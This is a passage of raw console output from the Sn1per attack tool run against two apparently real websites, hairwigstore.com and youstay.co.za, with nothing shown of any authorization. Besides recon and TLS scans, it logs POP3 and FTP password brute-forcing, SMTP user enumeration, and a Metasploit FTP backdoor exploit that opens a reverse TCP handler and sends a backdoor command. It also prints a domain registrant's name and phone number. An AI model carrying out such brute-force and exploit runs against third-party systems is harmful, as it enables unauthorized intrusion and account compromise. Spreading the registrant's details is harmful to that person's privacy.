653. |_[ + ] [ 5 / 19 ]-[21:26:10] [ - ]
654. |_[ + ] Target:: [ http://www.hairwigstore.com/Store/Costume-Wigs ]
655. |_[ + ] Exploit::
656. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx/1.10.1 , IP:192.254.237.91:80
657. |_[ + ] More details:: / - / , ISP:
658. |_[ + ] Found:: UNIDENTIFIED
659.  
660. _[ - ]::--------------------------------------------------------------------------------------------------------------
661. |_[ + ] [ 6 / 19 ]-[21:26:12] [ - ]
662. |_[ + ] Target:: [ http://www.hairwigstore.com/Wigs/Human-Hair-Wigs ]
663. |_[ + ] Exploit::
664. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx/1.10.1 , IP:192.254.237.91:80
665. |_[ + ] More details:: / - / , ISP:
666. |_[ + ] Found:: UNIDENTIFIED
667.  
668. _[ - ]::--------------------------------------------------------------------------------------------------------------
669. |_[ + ] [ 7 / 19 ]-[21:26:14] [ - ]
670. |_[ + ] Target:: [ http://www.hairwigstore.com/Wigs/African-American-Wigs ]
671. |_[ + ] Exploit::
672. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx/1.10.1 , IP:192.254.237.91:80
673. |_[ + ] More details:: / - / , ISP:
674. |_[ + ] Found:: UNIDENTIFIED
675.  
676. _[ - ]::--------------------------------------------------------------------------------------------------------------
677. |_[ + ] [ 8 / 19 ]-[21:26:15] [ - ]
678. |_[ + ] Target:: [ http://www.hairwigstore.com/Store/Wig-Care-and-Tools ]
679. |_[ + ] Exploit::
680. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx/1.10.1 , IP:192.254.237.91:80
681. |_[ + ] More details:: / - / , ISP:
682. |_[ + ] Found:: UNIDENTIFIED
683.  
684. _[ - ]::--------------------------------------------------------------------------------------------------------------
685. |_[ + ] [ 9 / 19 ]-[21:26:17] [ - ]
686. |_[ + ] Target:: [ http://www.hairwigstore.com/Wig-Care-and-Tools/Other ]
687. |_[ + ] Exploit::
688. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx/1.10.1 , IP:192.254.237.91:80
689. |_[ + ] More details:: / - / , ISP:
690. |_[ + ] Found:: UNIDENTIFIED
691.  
692. _[ - ]::--------------------------------------------------------------------------------------------------------------
693. |_[ + ] [ 10 / 19 ]-[21:26:19] [ - ]
694. |_[ + ] Target:: [ http://www.hairwigstore.com/Wig-Care-and-Tools/Adhesives ]
695. |_[ + ] Exploit::
696. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx/1.10.1 , IP:192.254.237.91:80
697. |_[ + ] More details:: / - / , ISP:
698. |_[ + ] Found:: UNIDENTIFIED
699.  
700. _[ - ]::--------------------------------------------------------------------------------------------------------------
701. |_[ + ] [ 11 / 19 ]-[21:26:20] [ - ]
702. |_[ + ] Target:: [ http://www.hairwigstore.com/Wig-Care-and-Tools/Caps ]
703. |_[ + ] Exploit::
704. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx/1.10.1 , IP:192.254.237.91:80
705. |_[ + ] More details:: / - / , ISP:
706. |_[ + ] Found:: UNIDENTIFIED
707.  
708. _[ - ]::--------------------------------------------------------------------------------------------------------------
709. |_[ + ] [ 12 / 19 ]-[21:26:22] [ - ]
710. |_[ + ] Target:: [ http://www.hairwigstore.com/Wig-Care-and-Tools/Wig-Stands ]
711. |_[ + ] Exploit::
712. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx/1.10.1 , IP:192.254.237.91:80
713. |_[ + ] More details:: / - / , ISP:
714. |_[ + ] Found:: UNIDENTIFIED
715.  
716. _[ - ]::--------------------------------------------------------------------------------------------------------------
717. |_[ + ] [ 13 / 19 ]-[21:26:23] [ - ]
718. |_[ + ] Target:: [ http://www.hairwigstore.com/how-to-put-on-a-wig ]
719. |_[ + ] Exploit::
720. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx/1.10.1 , IP:192.254.237.91:80
721. |_[ + ] More details:: / - / , ISP:
722. |_[ + ] Found:: UNIDENTIFIED
723.  
724. _[ - ]::--------------------------------------------------------------------------------------------------------------
725. |_[ + ] [ 14 / 19 ]-[21:26:24] [ - ]
726. |_[ + ] Target:: [ http://www.hairwigstore.com/how-to-apply-lace-front-wigs ]
727. |_[ + ] Exploit::
728. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx/1.10.1 , IP:192.254.237.91:80
729. |_[ + ] More details:: / - / , ISP:
730. |_[ + ] Found:: UNIDENTIFIED
731.  
732. _[ - ]::--------------------------------------------------------------------------------------------------------------
733. |_[ + ] [ 15 / 19 ]-[21:26:25] [ - ]
734. |_[ + ] Target:: [ http://www.hairwigstore.com/how-to-make-clip-in-hair-extension ]
735. |_[ + ] Exploit::
736. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx/1.10.1 , IP:192.254.237.91:80
737. |_[ + ] More details:: / - / , ISP:
738. |_[ + ] Found:: UNIDENTIFIED
739.  
740. _[ - ]::--------------------------------------------------------------------------------------------------------------
741. |_[ + ] [ 16 / 19 ]-[21:26:26] [ - ]
742. |_[ + ] Target:: [ http://www.hairwigstore.com/Wig-Care-and-Tools/function.file-get-contents ]
743. |_[ + ] Exploit::
744. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx/1.10.1 , IP:192.254.237.91:80
745. |_[ + ] More details:: / - / , ISP:
746. |_[ + ] Found:: UNIDENTIFIED
747.  
748. _[ - ]::--------------------------------------------------------------------------------------------------------------
749. |_[ + ] [ 17 / 19 ]-[21:26:27] [ - ]
750. |_[ + ] Target:: [ http://www.hairwigstore.com/how-do-i-create-a-hairline-in-a-wig ]
751. |_[ + ] Exploit::
752. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx/1.10.1 , IP:192.254.237.91:80
753. |_[ + ] More details:: / - / , ISP:
754. |_[ + ] Found:: UNIDENTIFIED
755.  
756. _[ - ]::--------------------------------------------------------------------------------------------------------------
757. |_[ + ] [ 18 / 19 ]-[21:26:28] [ - ]
758. |_[ + ] Target:: [ http://www.hairwigstore.com/determining-the-type-of-wig-you-need ]
759. |_[ + ] Exploit::
760. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx/1.10.1 , IP:192.254.237.91:80
761. |_[ + ] More details:: / - / , ISP:
762. |_[ + ] Found:: UNIDENTIFIED
763.  
764. [ INFO ] [ Shutting down ]
765. [ INFO ] [ End of process INURLBR at [07-07-2016 21:26:28]
766. [ INFO ] [ TOTAL FILTERED VALUES ]:: [ 0 ]
767. [ INFO ] [ OUTPUT FILE ]:: [ /root/Sn1per/output/loot/inurlbr-hairwigstore.com.txt ]
768. |_________________________________________________________________________________________
769.  
770. \_________________________________________________________________________________________/
771.  
772. + -- --=[Port 110 opened... running tests...
773.  
774. Starting Nmap 7.12SVN ( https://nmap.org ) at 2016-07-07 21:26 EEST
775. Nmap scan report for hairwigstore.com (192.254.237.91)
776. Host is up (0.23s latency).
777. PORT STATE SERVICE VERSION
778. 110/tcp open pop3 Dovecot pop3d
779. | pop3-brute:
780. | Accounts: No valid accounts found
781. |_ Statistics: Performed 120 guesses in 183 seconds, average tps: 0
782. |_pop3-capabilities: PIPELINING AUTH-RESP-CODE USER RESP-CODES STLS UIDL CAPA TOP SASL(PLAIN LOGIN)
783.  
784. Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
785. Nmap done: 1 IP address (1 host up) scanned in 185.38 seconds
786. + -- --=[Port 111 closed... skipping.
787. + -- --=[Port 135 closed... skipping.
788. + -- --=[Port 139 closed... skipping.
789. + -- --=[Port 162 closed... skipping.
790. + -- --=[Port 389 closed... skipping.
791. + -- --=[Port 443 opened... running tests...
792. ################################### Checking for WAF ##############################
793.  
794. ^ ^
795. _ __ _ ____ _ __ _ _ ____
796. ///7/ /.' \ / __////7/ /,' \ ,' \ / __/
797. | V V // o // _/ | V V // 0 // 0 // _/
798. |_n_,'/_n_//_/ |_n_,' \_,' \_,'/_/
799. <
800. ...'
801.  
802. WAFW00F - Web Application Firewall Detection Tool
803.  
804. By Sandro Gauci && Wendel G. Henrique
805.  
806. Checking https://hairwigstore.com
807. The site https://hairwigstore.com is behind a ModSecurity (OWASP CRS)
808. Number of requests: 11
809.  
810. ################################### Gathering HTTP Info ###########################
811. ./whatweb: /usr/lib/ruby/vendor_ruby/rchardet/universaldetector.rb:39: invalid multibyte escape: /[\x80-\xFF]/ (SyntaxError)
812.  
813. ################################### Gathering SSL/TLS Info ########################
814. Version: 1.11.7-static
815. OpenSSL 1.0.2i-dev xx XXX xxxx
816.  
817. Testing SSL server hairwigstore.com on port 443
818.  
819. TLS Fallback SCSV:
820. Server supports TLS Fallback SCSV
821.  
822. TLS renegotiation:
823. Secure session renegotiation supported
824.  
825. TLS Compression:
826. Compression disabled
827.  
828. Heartbleed:
829. TLS 1.2 not vulnerable to heartbleed
830. TLS 1.1 not vulnerable to heartbleed
831. TLS 1.0 not vulnerable to heartbleed
832.  
833. Supported Server Cipher(s):
834. Preferred TLSv1.2 256 bits ECDHE-RSA-AES256-GCM-SHA384 Curve P-256 DHE 256
835. Accepted TLSv1.2 128 bits ECDHE-RSA-AES128-GCM-SHA256 Curve P-256 DHE 256
836. Accepted TLSv1.2 256 bits ECDHE-RSA-AES256-SHA384 Curve P-256 DHE 256
837. Accepted TLSv1.2 128 bits ECDHE-RSA-AES128-SHA256 Curve P-256 DHE 256
838. Accepted TLSv1.2 256 bits DHE-RSA-AES256-GCM-SHA384 DHE 2048 bits
839. Accepted TLSv1.2 128 bits DHE-RSA-AES128-GCM-SHA256 DHE 2048 bits
840. Accepted TLSv1.2 256 bits DHE-RSA-AES256-SHA256 DHE 2048 bits
841. Accepted TLSv1.2 128 bits DHE-RSA-AES128-SHA256 DHE 2048 bits
842. Accepted TLSv1.2 256 bits ECDHE-RSA-AES256-SHA Curve P-256 DHE 256
843. Accepted TLSv1.2 128 bits ECDHE-RSA-AES128-SHA Curve P-256 DHE 256
844. Accepted TLSv1.2 256 bits DHE-RSA-AES256-SHA DHE 2048 bits
845. Accepted TLSv1.2 128 bits DHE-RSA-AES128-SHA DHE 2048 bits
846. Preferred TLSv1.1 256 bits ECDHE-RSA-AES256-SHA Curve P-256 DHE 256
847. Accepted TLSv1.1 128 bits ECDHE-RSA-AES128-SHA Curve P-256 DHE 256
848. Accepted TLSv1.1 256 bits DHE-RSA-AES256-SHA DHE 2048 bits
849. Accepted TLSv1.1 128 bits DHE-RSA-AES128-SHA DHE 2048 bits
850. Preferred TLSv1.0 256 bits ECDHE-RSA-AES256-SHA Curve P-256 DHE 256
851. Accepted TLSv1.0 128 bits ECDHE-RSA-AES128-SHA Curve P-256 DHE 256
852. Accepted TLSv1.0 256 bits DHE-RSA-AES256-SHA DHE 2048 bits
853. Accepted TLSv1.0 128 bits DHE-RSA-AES128-SHA DHE 2048 bits
854.  
855. SSL Certificate:
856. Signature Algorithm: sha256WithRSAEncryption
857. RSA Key Strength: 2048
858.  
859. Subject: *.hostgator.com
860. Altnames: DNS:*.hostgator.com, DNS:hostgator.com
861. Issuer: COMODO RSA Domain Validation Secure Server CA
862.  
863. Not valid before: Oct 16 00:00:00 2015 GMT
864. Not valid after: Oct 15 23:59:59 2018 GMT
865.  
866.  
867.  
868. AVAILABLE PLUGINS
869. -----------------
870.  
871. PluginCertInfo
872. PluginOpenSSLCipherSuites
873. PluginChromeSha1Deprecation
874. PluginHSTS
875. PluginSessionResumption
876. PluginHeartbleed
877. PluginSessionRenegotiation
878. PluginCompression
879.  
880.  
881.  
882. CHECKING HOST(S) AVAILABILITY
883. -----------------------------
884.  
885. hairwigstore.com:443 => 192.254.237.91:443
886.  
887.  
888.  
889. SCAN RESULTS FOR HAIRWIGSTORE.COM:443 - 192.254.237.91:443
890. ----------------------------------------------------------
891.  
892. * Deflate Compression:
893. OK - Compression disabled
894.  
895. * Session Renegotiation:
896. Client-initiated Renegotiations: OK - Rejected
897. Secure Renegotiation: OK - Supported
898.  
899. * Certificate - Content:
900. SHA1 Fingerprint: 9141b50cee603888dc45f4f285c1c8844fe12221
901. Common Name: *.hostgator.com
902. Issuer: COMODO RSA Domain Validation Secure Server CA
903. Serial Number: 19607DA086E8A7FE72900982CFED93BF
904. Not Before: Oct 16 00:00:00 2015 GMT
905. Not After: Oct 15 23:59:59 2018 GMT
906. Signature Algorithm: sha256WithRSAEncryption
907. Public Key Algorithm: rsaEncryption
908. Key Size: 2048 bit
909. Exponent: 65537 (0x10001)
910. X509v3 Subject Alternative Name: {'DNS': ['*.hostgator.com', 'hostgator.com']}
911.  
912. * Certificate - Trust:
913. Hostname Validation: FAILED - Certificate does NOT match hairwigstore.com
914. Google CA Store (09/2015): OK - Certificate is trusted
915. Java 6 CA Store (Update 65): OK - Certificate is trusted
916. Microsoft CA Store (09/2015): OK - Certificate is trusted
917. Mozilla NSS CA Store (09/2015): OK - Certificate is trusted
918. Apple CA Store (OS X 10.10.5): OK - Certificate is trusted
919. Certificate Chain Received: ['*.hostgator.com', 'COMODO RSA Domain Validation Secure Server CA', 'COMODO RSA Certification Authority']
920.  
921. * Certificate - OCSP Stapling:
922. NOT SUPPORTED - Server did not send back an OCSP response.
923.  
924. * Session Resumption:
925. With Session IDs: OK - Supported (5 successful, 0 failed, 0 errors, 5 total attempts).
926. With TLS Session Tickets: OK - Supported
927.  
928. * SSLV2 Cipher Suites:
929. Server rejected all cipher suites.
930.  
931. * SSLV3 Cipher Suites:
932. Undefined - An unexpected error happened:
933. PSK-3DES-EDE-CBC-SHA error - [Errno 111] Connection refused
934. NULL-SHA256 error - [Errno 111] Connection refused
935. NULL-SHA error - [Errno 111] Connection refused
936. NULL-MD5 error - [Errno 111] Connection refused
937. EXP-RC4-MD5 error - [Errno 111] Connection refused
938. EXP-RC2-CBC-MD5 error - [Errno 111] Connection refused
939. EXP-EDH-RSA-DES-CBC-SHA error - [Errno 111] Connection refused
940. EXP-EDH-DSS-DES-CBC-SHA error - [Errno 111] Connection refused
941. EXP-DES-CBC-SHA error - [Errno 111] Connection refused
942. EXP-ADH-RC4-MD5 error - [Errno 111] Connection refused
943. EXP-ADH-DES-CBC-SHA error - [Errno 111] Connection refused
944. EDH-RSA-DES-CBC-SHA error - [Errno 111] Connection refused
945. EDH-DSS-DES-CBC-SHA error - [Errno 111] Connection refused
946. ECDHE-RSA-NULL-SHA error - [Errno 111] Connection refused
947. ECDHE-ECDSA-NULL-SHA error - [Errno 111] Connection refused
948. ECDH-RSA-NULL-SHA error - [Errno 111] Connection refused
949. ECDH-RSA-DES-CBC3-SHA error - [Errno 111] Connection refused
950. ECDH-ECDSA-NULL-SHA error - [Errno 111] Connection refused
951. ECDH-ECDSA-DES-CBC3-SHA error - [Errno 111] Connection refused
952. DH-RSA-DES-CBC-SHA error - [Errno 111] Connection refused
953. DH-DSS-DES-CBC-SHA error - [Errno 111] Connection refused
954. DES-CBC3-SHA error - [Errno 111] Connection refused
955. DES-CBC-SHA error - [Errno 111] Connection refused
956. AECDH-NULL-SHA error - [Errno 111] Connection refused
957. ADH-DES-CBC3-SHA error - [Errno 111] Connection refused
958. ADH-DES-CBC-SHA error - [Errno 111] Connection refused
959.  
960.  
961.  
962. SCAN COMPLETED IN 18.61 S
963. -------------------------
964.  
965. **TARGET: YOUSTAY.CO.ZA **
966. ____
967. _________ / _/___ ___ _____
968. / ___/ __ \ / // __ \/ _ \/ ___/
969. (__ ) / / // // /_/ / __/ /
970. /____/_/ /_/___/ .___/\___/_/
971. /_/
972.  
973. + -- --=[http://crowdshield.com
974. + -- --=[sn1per v1.7 by 1N3
975.  
976. ################################### Running recon #################################
977. ../../../../lib/isc/unix/net.c:581: sendmsg() failed: Operation not permitted
978. Server: 8.8.8.8
979. Address: 8.8.8.8#53
980.  
981. Non-authoritative answer:
982. Name: youstay.co.za
983. Address: 50.87.144.166
984.  
985. ../../../../lib/isc/unix/net.c:581: sendmsg() failed: Operation not permitted
986. youstay.co.za has address 50.87.144.166
987.  
988. Xprobe2 v.0.3 Copyright (c) 2002-2005 [email protected], [email protected], [email protected]
989.  
990. [+] Target is youstay.co.za
991. [+] Loading modules.
992. [+] Following modules are loaded:
993. [x] [1] ping:icmp_ping - ICMP echo discovery module
994. [x] [2] ping:tcp_ping - TCP-based ping discovery module
995. [x] [3] ping:udp_ping - UDP-based ping discovery module
996. [x] [4] infogather:ttl_calc - TCP and UDP based TTL distance calculation
997. [x] [5] infogather:portscan - TCP and UDP PortScanner
998. [x] [6] fingerprint:icmp_echo - ICMP Echo request fingerprinting module
999. [x] [7] fingerprint:icmp_tstamp - ICMP Timestamp request fingerprinting module
1000. [x] [8] fingerprint:icmp_amask - ICMP Address mask request fingerprinting module
1001. [x] [9] fingerprint:icmp_port_unreach - ICMP port unreachable fingerprinting module
1002. [x] [10] fingerprint:tcp_hshake - TCP Handshake fingerprinting module
1003. [x] [11] fingerprint:tcp_rst - TCP RST fingerprinting module
1004. [x] [12] fingerprint:smb - SMB fingerprinting module
1005. [x] [13] fingerprint:snmp - SNMPv2c fingerprinting module
1006. [+] 13 modules registered
1007. [+] Initializing scan engine
1008. [+] Running scan engine
1009. [-] ping:tcp_ping module: no closed/open TCP ports known on 50.87.144.166. Module test failed
1010. [-] ping:udp_ping module: no closed/open UDP ports known on 50.87.144.166. Module test failed
1011. [-] No distance calculation. 50.87.144.166 appears to be dead or no ports known
1012. [+] Host: 50.87.144.166 is up (Guess probability: 50%)
1013. [+] Target: 50.87.144.166 is alive. Round-Trip Time: 0.22283 sec
1014. [+] Selected safe Round-Trip Time value is: 0.44567 sec
1015. [-] fingerprint:tcp_hshake Module execution aborted (no open TCP ports known)
1016. [-] fingerprint:smb need either TCP port 139 or 445 to run
1017. [-] fingerprint:snmp: need UDP port 161 open
1018. [+] Primary guess:
1019. [+] Host 50.87.144.166 Running OS: ��>]+V (Guess probability: 95%)
1020. [+] Other guesses:
1021. [+] Host 50.87.144.166 Running OS: ��>]+V (Guess probability: 95%)
1022. [+] Host 50.87.144.166 Running OS: ��>]+V (Guess probability: 95%)
1023. [+] Host 50.87.144.166 Running OS: ��>]+V (Guess probability: 95%)
1024. [+] Host 50.87.144.166 Running OS: ��>]+V (Guess probability: 95%)
1025. [+] Host 50.87.144.166 Running OS: ��>]+V (Guess probability: 95%)
1026. [+] Host 50.87.144.166 Running OS: ��>]+V (Guess probability: 95%)
1027. [+] Host 50.87.144.166 Running OS: ��>]+V (Guess probability: 95%)
1028. [+] Host 50.87.144.166 Running OS: ��>]+V (Guess probability: 95%)
1029. [+] Host 50.87.144.166 Running OS: ��>]+V (Guess probability: 95%)
1030. [+] Cleaning up scan engine
1031. [+] Modules deinitialized
1032. [+] Execution completed.
1033. ../../../../lib/isc/unix/net.c:581: sendmsg() failed: Operation not permitted
1034.  
1035. ; <<>> DiG 9.10.3-P4-Debian <<>> -x youstay.co.za
1036. ;; global options: +cmd
1037. ;; Got answer:
1038. ;; ->>HEADER<<- opcode: QUERY, status: NXDOMAIN, id: 28326
1039. ;; flags: qr rd ra ad; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 1
1040.  
1041. ;; OPT PSEUDOSECTION:
1042. ; EDNS: version: 0, flags:; udp: 4096
1043. ;; QUESTION SECTION:
1044. ;za.co.youstay.in-addr.arpa. IN PTR
1045.  
1046. ;; AUTHORITY SECTION:
1047. in-addr.arpa. 3505 IN SOA b.in-addr-servers.arpa. nstld.iana.org. 2015073986 1800 900 604800 3600
1048.  
1049. ;; Query time: 159 msec
1050. ;; SERVER: 8.8.8.8#53(8.8.8.8)
1051. ;; WHEN: Mon Jul 11 00:47:57 EEST 2016
1052. ;; MSG SIZE rcvd: 123
1053.  
1054. Domain Name:
1055. youstay.co.za
1056.  
1057. Registrant:
1058. Joel Giddey
1059.  
1060. Email: [email protected]
1061. Tel: +27.218533256
1062. Fax:
1063.  
1064. Registrant's Address:
1065. Strand
1066.  
1067. Registrar:
1068. ZACR
1069.  
1070. Relevant Dates:
1071. Registration Date: 2008-10-07
1072. Renewal Date: 2016-10-07
1073.  
1074. Domain Status:
1075. Registered until renewal date
1076.  
1077. Pending Timer Events:
1078. None
1079.  
1080. Name Servers:
1081. ns1103.hostgator.com
1082. ns1104.hostgator.com
1083.  
1084. WHOIS lookup made at 2016-07-10 21:47 UTC
1085.  
1086. --
1087. The use of this Whois facility is subject to the following terms and
1088. conditions. https://registry.net.za/whois_terms
1089. Copyright (c) ZACR 1995-2016
1090. Smartmatch is experimental at ./dnsenum.pl line 698.
1091. Smartmatch is experimental at ./dnsenum.pl line 698.
1092. dnsenum.pl VERSION:1.2.4
1093.  
1094. ----- youstay.co.za -----
1095.  
1096.  
1097. Host's addresses:
1098. __________________
1099.  
1100. youstay.co.za. 3594 IN A 50.87.144.166
1101.  
1102.  
1103. Wildcard detection using: mzlsmbdjzsqd
1104. _______________________________________
1105.  
1106. mzlsmbdjzsqd.youstay.co.za. 3600 IN A 50.87.144.166
1107.  
1108.  
1109. !!!!!!!!!!!!!!!!!!!!!!!!!!!!
1110.  
1111. Wildcards detected, all subdomains will point to the same IP address
1112. Omitting results containing 50.87.144.166.
1113. Maybe you are using OpenDNS servers.
1114.  
1115. !!!!!!!!!!!!!!!!!!!!!!!!!!!!
1116.  
1117.  
1118. Name Servers:
1119. ______________
1120.  
1121. youstay.co.za NS record query failed: NOERROR
1122.  
1123. ____ _ _ _ _ _____
1124. / ___| _ _| |__ | (_)___| |_|___ / _ __
1125. \___ \| | | | '_ \| | / __| __| |_ \| '__|
1126. ___) | |_| | |_) | | \__ \ |_ ___) | |
1127. |____/ \__,_|_.__/|_|_|___/\__|____/|_|
1128.  
1129. # Fast Subdomains Enumeration tool using Search Engines and BruteForce
1130. # Coded By Ahmed Aboul-Ela - @aboul3la
1131. # Special Thanks to Ibrahim Mosaad - @ibrahim_mosaad for his contributions
1132.  
1133. [-] Enumerating subdomains now for youstay.co.za
1134. [-] verbosity is enabled, will show the subdomains results in realtime
1135. [-] Searching now in Baidu..
1136. [-] Searching now in Yahoo..
1137. [-] Searching now in Google..
1138. [-] Searching now in Bing..
1139. [-] Searching now in Ask..
1140. [-] Searching now in Netcraft..
1141. [-] Searching now in DNSdumpster..
1142.  
1143. ################################### Pinging host ###################################
1144. PING youstay.co.za (50.87.144.166) 56(84) bytes of data.
1145. 64 bytes from gator3130.hostgator.com (50.87.144.166): icmp_seq=1 ttl=51 time=220 ms
1146.  
1147. --- youstay.co.za ping statistics ---
1148. 1 packets transmitted, 1 received, 0% packet loss, time 0ms
1149. rtt min/avg/max/mdev = 220.910/220.910/220.910/0.000 ms
1150.  
1151. ################################### Running TCP port scan ##########################
1152.  
1153. Starting Nmap 7.12SVN ( https://nmap.org ) at 2016-07-11 00:48 EEST
1154. Nmap scan report for youstay.co.za (50.87.144.166)
1155. Host is up (0.23s latency).
1156. rDNS record for 50.87.144.166: gator3130.hostgator.com
1157. Not shown: 23 closed ports, 6 filtered ports
1158. PORT STATE SERVICE
1159. 21/tcp open ftp
1160. 25/tcp open smtp
1161. 80/tcp open http
1162. 110/tcp open pop3
1163. 443/tcp open https
1164. 3306/tcp open mysql
1165. 8080/tcp open http-proxy
1166. 8443/tcp open https-alt
1167.  
1168. Nmap done: 1 IP address (1 host up) scanned in 2.33 seconds
1169. ################################### Running UDP port scan ##########################
1170.  
1171. Starting Nmap 7.12SVN ( https://nmap.org ) at 2016-07-11 00:48 EEST
1172. WARNING: a TCP scan type was requested, but no tcp ports were specified. Skipping this scan type.
1173. Nmap done: 1 IP address (1 host up) scanned in 0.50 seconds
1174.  
1175. ################################### Running Intrusive Scans ########################
1176. + -- --=[Port 21 opened... running tests...
1177.  
1178. Starting Nmap 7.12SVN ( https://nmap.org ) at 2016-07-11 00:48 EEST
1179. Nmap scan report for youstay.co.za (50.87.144.166)
1180. Host is up (0.23s latency).
1181. rDNS record for 50.87.144.166: gator3130.hostgator.com
1182. PORT STATE SERVICE VERSION
1183. 21/tcp open ftp Pure-FTPd
1184. | ftp-brute:
1185. | Accounts: No valid accounts found
1186. | Statistics: Performed 17 guesses in 66 seconds, average tps: 0
1187. |_ ERROR: Too many retries, aborted ...
1188.  
1189. Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
1190. Nmap done: 1 IP address (1 host up) scanned in 67.50 seconds
1191.  
1192. IIIIII dTb.dTb _.---._
1193. II 4' v 'B .'"".'/|\`.""'.
1194. II 6. .P : .' / | \ `. :
1195. II 'T;. .;P' '.' / | \ `.'
1196. II 'T; ;P' `. / | \ .'
1197. IIIIII 'YvP' `-.__|__.-'
1198.  
1199. I love shells --egypt
1200.  
1201.  
1202. Easy phishing: Set up email templates, landing pages and listeners
1203. in Metasploit Pro -- learn more on http://rapid7.com/metasploit
1204.  
1205. =[ metasploit v4.12.7-dev ]
1206. + -- --=[ 1551 exploits - 898 auxiliary - 267 post ]
1207. + -- --=[ 438 payloads - 38 encoders - 8 nops ]
1208. + -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]
1209.  
1210. RHOST => youstay.co.za
1211. RHOSTS => youstay.co.za
1212. [*] youstay.co.za:21 - Banner: 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------
1213. 220-You are user number 5 of 150 allowed.
1214. 220-Local time is now 16:49. Server port: 21.
1215. 220-IPv6 connections are also welcome on this server.
1216. 220 You will be disconnected after 15 minutes of inactivity.
1217. [*] youstay.co.za:21 - USER: 331 User 5:) OK. Password required
1218. [*] Exploit completed, but no session was created.
1219. [*] Started reverse TCP double handler on 10.42.0.14:4444
1220. [*] youstay.co.za:21 - Sending Backdoor Command
1221. [*] Exploit completed, but no session was created.
1222. + -- --=[Port 22 closed... skipping.
1223. + -- --=[Port 23 closed... skipping.
1224. + -- --=[Port 25 opened... running tests...
1225.  
1226. Starting Nmap 7.12SVN ( https://nmap.org ) at 2016-07-11 00:49 EEST
1227. Nmap scan report for youstay.co.za (50.87.144.166)
1228. Host is up (0.22s latency).
1229. rDNS record for 50.87.144.166: gator3130.hostgator.com
1230. PORT STATE SERVICE VERSION
1231. 25/tcp open smtp Exim smtpd 4.86_1
1232. |_smtp-commands: Couldn't establish connection on port 25
1233. | smtp-enum-users:
1234. |_ Couldn't establish connection on port 25
1235. |_smtp-open-relay: SMTP RSET: failed to receive data: connection closed
1236. | smtp-vuln-cve2010-4344:
1237. |_ The SMTP server is not Exim: NOT VULNERABLE
1238.  
1239. Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
1240. Nmap done: 1 IP address (1 host up) scanned in 32.88 seconds
1241. Starting smtp-user-enum v1.2 ( http://pentestmonkey.net/tools/smtp-user-enum )
1242.  
1243. ----------------------------------------------------------
1244. | Scan Information |
1245. ----------------------------------------------------------
1246.  
1247. Mode ..................... VRFY
1248. Worker Processes ......... 5
1249. Usernames file ........... BruteX/wordlists/simple-users.txt
1250. Target count ............. 1
1251. Username count ........... 34
1252. Target TCP port .......... 25
1253. Query timeout ............ 5 secs
1254. Target domain ............
1255.  
1256. ######## Scan started at Mon Jul 11 00:50:24 2016 #########
1257. ######## Scan completed at Mon Jul 11 00:50:34 2016 #########
1258. 0 results.
1259.  
1260. 34 queries in 10 seconds (3.4 queries / sec)
1261.  
1262.  
1263. ______________________________________________________________________________
1264. | |
1265. | METASPLOIT CYBER MISSILE COMMAND V4 |
1266. |______________________________________________________________________________|
1267. \ / /
1268. \ . / / x
1269. \ / /
1270. \ / + /
1271. \ + / /
1272. * / /
1273. / . /
1274. X / / X
1275. / ###
1276. / # % #
1277. / ###
1278. . /
1279. . / . * .
1280. /
1281. *
1282. + *
1283.  
1284. ^
1285. #### __ __ __ ####### __ __ __ ####
1286. #### / \ / \ / \ ########### / \ / \ / \ ####
1287. ################################################################################
1288. ################################################################################
1289. # WAVE 4 ######## SCORE 31337 ################################## HIGH FFFFFFFF #
1290. ################################################################################
1291. http://metasploit.pro
1292.  
1293.  
1294. Taking notes in notepad? Have Metasploit Pro track & report
1295. your progress and findings -- learn more on http://rapid7.com/metasploit
1296.  
1297. =[ metasploit v4.12.7-dev ]
1298. + -- --=[ 1551 exploits - 898 auxiliary - 267 post ]
1299. + -- --=[ 438 payloads - 38 encoders - 8 nops ]
1300. + -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]
1301.  
1302. RHOSTS => youstay.co.za
1303. RHOST => youstay.co.za
1304. [*] 50.87.144.166:25 - 50.87.144.166:25 Banner: 220-gator3130.hostgator.com ESMTP Exim 4.86_1 #1 Sun, 10 Jul 2016 16:50:50 -0500
1305. 220-We do not authorize the use of this system to transport unsolicited,
1306. 220 and/or bulk e-mail.
1307. [*] 50.87.144.166:25 - 50.87.144.166:25 could not be enumerated (no EXPN, no VRFY, invalid RCPT)
1308. [*] youstay.co.za:25 - Scanned 1 of 1 hosts (100% complete)
1309. [*] Auxiliary module execution completed
1310. + -- --=[Port 53 closed... skipping.
1311. + -- --=[Port 79 closed... skipping.
1312. + -- --=[Port 80 opened... running tests...
1313. ################################### Checking for WAF ##############################
1314.  
1315. ^ ^
1316. _ __ _ ____ _ __ _ _ ____
1317. ///7/ /.' \ / __////7/ /,' \ ,' \ / __/
1318. | V V // o // _/ | V V // 0 // 0 // _/
1319. |_n_,'/_n_//_/ |_n_,' \_,' \_,'/_/
1320. <
1321. ...'
1322.  
1323. WAFW00F - Web Application Firewall Detection Tool
1324.  
1325. By Sandro Gauci && Wendel G. Henrique
1326.  
1327. Checking http://youstay.co.za
1328. The site http://youstay.co.za is behind a ModSecurity (OWASP CRS)
1329. Number of requests: 12
1330.  
1331. ################################### Gathering HTTP Info ###########################
